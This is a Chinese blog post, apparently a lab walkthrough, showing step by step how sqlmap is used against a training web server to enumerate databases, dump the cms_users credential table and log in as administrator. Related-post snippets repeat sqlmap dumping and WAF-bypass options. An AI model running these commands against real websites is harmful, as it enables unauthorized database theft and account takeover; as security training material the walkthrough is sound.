渗透测试-sqlMap工具

已于 2022-09-09 23:40:20 修改
阅读量2.5k 收藏 2
点赞数 6
文章标签: linux 数据库 测试工具
于 2022-09-02 19:09:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49349476/article/details/126668745
版权

利用SqlMap工具攻击网站,进入数据库(MySQL),获取管理员账号和密码,登录网站。kali系统有SqlMap工具,所以用kali系统作为攻击机,靶机是一个文章管理系统的网站服务器。(所用环境来源于360)

靶机ip:172.23.188.13

第一步:在kali系统浏览器访问web服务器

命令:

http://172.23.188.13:8083/show.php?id=3

172.23.188.13:靶机ip 8083 是端口

第二步:在kali系统终端上,进行sql注入,获取数据库信息

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3

 

在执行过程中,会询问配置选择时,都默认输入yes或y,如下图
 
在选择完默认配置之后,会显示出web服务的信息,如下图


 
第三步:获取web服务器上的数据库信息

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 --dbs

--dbs 是查看所有数据库

 

执行完命令之后获得数据库信息如下
 
第4步:进入查看数据库cms中的表

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms --tables

-D 是查看某个数据库, cms是数据库名,用来查看cms数据库
--tables 查看数据库中所有的表

 


命令执行完之后,结果如下。cms_users应该是存放用户帐号和密码的表
 
第5步:进入cms数据库中的cms_users表,查看所有的字段
 命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns

-T 是查看某个数据表, cms_users是表名,用来查看cms_users表
--columns 查看的表中的所有字段


执行完命令得到结果

 

第6步:进入cms数据库中的cms_users表,查看所有的字段,及字段的内容

命令:

sqlmap -u http://172.23.188.13:8083/show.php?id=3 -D cms -T cms_users --columns --dump

-T 是查看某个数据表, cms_users是表名,用来查看cms_users表
--columns 查看的表中的所有字段
--dump 查看所有字段的内容


 
在执行过程中,会询问4次配置选择,选择如下
 
得到结果如下:

 

第7步:用帐号密码登录网站
               
结果登录成功,如下图
 

纪水一
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
SQLMAP基本使用
qq_49310461的博客
10-21 1408
SQLMAP基本使用 检查注入点: sqlmap -u http://aa.com/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs 爆当前数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db 指定库名列出所有表 sqlmap -u http://aa.com/star_phot
【笔记】使用Sqlmap对目标站点进行渗透攻击【基础实验】
小渣渣的博客
05-10 1702
使用Sqlmap对目标站点进行渗透攻击 使用kali Linux环境中的sqlmap实现对目标靶机网站的注入猜解。 打开测试站点DVWA的主页面,并设置安全级别为low 单击左边的SQL Injection,打开如下图所示界面在User ID框中输入任意数字。 输入123456,运用burpsuite抓到的数据包如下: 在kali linux虚拟机的命令行状态下运行Sqlmap,并输入语句 ...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的绕waf脚本名称,方便针对各种过滤手段选择对应的脚本 在许多情况下,防火墙只能防御已知的攻击模式和威胁。然而,SQL注入是一种动态的、高度灵活的攻击方式,防火墙很难对其进行全面的防御。SQLMAP利用这一点,通过构造特定的SQL语句,绕过防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的SQL语句。这些语句在防火墙看来可能是正常的、合法的请求,但实际上却包含了恶意的SQL代码,能够导致数据库泄漏数据、甚至完全被控制。 当然,SQLMAP并不是一种万能的工具。它需要使用者具备一定的技术知识和经验,才能正确地使用并获得最佳效果。尽管如此,SQLMAP无疑是一个强大的工具,它可以帮助你发现那些防火墙可能无法检测到的安全风险。 总结起来,SQLMAP是一种强大的、能够绕过防火墙检测的工具。它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时修复这些漏洞,确保你的数据安全。所以,如果你想确保你的应用程序免受潜在威胁的影响,那么SQLMA
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库; SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持以下几种独特的注入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入; 基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假; 基于报错的注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中,比如数据库报错的信息等; 联合查询注入,即可以使用Union的情况下注入; 堆叠查询注入,即可以同时执行多条语句时的注入 ———————————————— 本工具仅用于测试使用,请勿用于非法用途,需自行承担法律风险
sqlmap靶机注入详细教程
Pythonit教程网
04-15 1397
基本用法:使用-u参数指定目标URL,例如:sqlmap -u "http://目标网站/?使用-D -T --columns参数列出指定表的所有列。使用-D -T --dump参数导出指定表的所有数据。
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程.docx
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。这是本人从sqlmap上下载来的最新版本sqlmap,没有作任何修该
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获 取数据到访问底层文件系统和通过带外连接在操作系统上执行命令
sqlmap使用技巧
qq_50613938的博客
11-02 833
Sqlmap使用的时候 应该python sqlmap.py 来使用,默认的情况下一般电脑原装2.7 他一般支持五种不同的模式 sqlmap支持五种不同的注入模式: l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入; l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断; l 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中; l 联合查询注入,可以使用union的情况下的注入; l 堆查询注入
【SQL注入工具】SQLMap参数详解
ssrf
09-02 2707
文章目录前言1、基本参数2、显示调试信息3、风险等级4、批量测试多个注入点5、获取http请求注入6、处理Google搜索结果7、以POST方式提交参数8、指定参数连接符9、cookie注入10、referer/headers/proxy11、时间控制12、绕过策略13、手动指定测试参数14、指定参数前后闭合字符15、指定使用哪种探测技术16、UNION查询指定参数17、二阶注入18、搜索指定库/表/列19、--udf-inject/--shared-lib20、日志文件读取与写入21、默认yes22、编码
sqlmap使用手册
good good study
03-25 9821
一. sqlmap介绍 相对于手工注入,sqlmap的高效注入大大提高了我们渗透效率。Sqlmap采用了以下5种独特的SQL注入技术: 联合查询,在可以使用Union的情况下注入(注入效率最高,成本最低) 报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中 布尔盲注,即可以根据返回页面判断条件真假的注入 延时注入,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断 堆叠查询,可以同时执行多条语句时的注入...
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
sqlmap参数详解
十五年游戏主程转渗透之路
04-09 6818
sqlmap
漏洞学习--sqlmap
qq_45675619的博客
03-15 4243
漏洞学习-sqlmap篇环境准备sqlmap用法详解sqlmap实战post注入get注入万能模板-rsqlmap小结 环境准备 python环境+sqlmap工具 我是win10系统在官网安装了sqlmap工具,直接用kali自带的也行。 sqlmap官网 网上安装教程挺多,跟着来就行 sqlmap用法详解 这是当时在网上找的参考博客,有些参数不清楚就查一下 sqlmap详解 sqlmap实战 post注入 以Pikachu靶场题目为例,post注入的参数不会出现在url中,用Burp抓包看看 pyt
注入神器-----SqlMap的使用
weixin_54227009的博客
05-28 1340
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
我的SQLmap使用方法(详解)
weixin_41182861的博客
05-12 4220
SQLMAP是一个由Python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞(sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等),是一款功能强大的sql漏洞检测利用工具。sqlmap可以检测的数据库有:access、mssql、mysql、oracle、postgresql、db2、sqlite等。其他功能:执行命令、列举用户、检测权限、自动破解、数据导出等功能。...
kali下的使用sqlmap自动检测SQLol中select模块下的注入点(一)
xianjie0318的博客
07-03 4797
一、kali linux下载、安装以及配置1、kali linux简介       Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。2、kali linux下载官方下载地址:https://www.kali.org/downl...
sqlmap默认输出路径的设置
热门推荐
YQ的博客
04-10 1万+
SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/output/下的。 但是刚安装完sqlmap后C:/Users/用户名/ 文件下是不存在.sqlmap这个文件夹的,需要使用sqlmap扫描一下网站,程序才会建立该文件夹。 设置sqlmap的默认输出路径很简单,执行如下命令: 在--output-dir后面输入想要导出的文件路径。 这样程序执行之后就
一个遭受千百次攻击的良心学习靶机网站DVWA
hackerie的博客
09-15 9869
话不多说,DVWA (Dam Vulnerable Web Application),一个供安全人员学习练手的优秀网站。以后该博客会慢慢收集类似的学习网站。希望大家共同进步!分享、学习、共同进步!
数据库渗透测试SQLMAP适用
06-08
SQLMAP是一个自动化的数据库渗透测试工具,主要是用于检测和利用Web应用程序中的SQL注入漏洞。它可以自动探测目标网站是否存在SQL注入漏洞,然后利用这些漏洞获取目标数据库的敏感数据。因此,SQLMAP非常适用于数据库渗透测试。不过,在实际使用中,需要注意合法性问题,遵守法律法规,不得进行非法操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值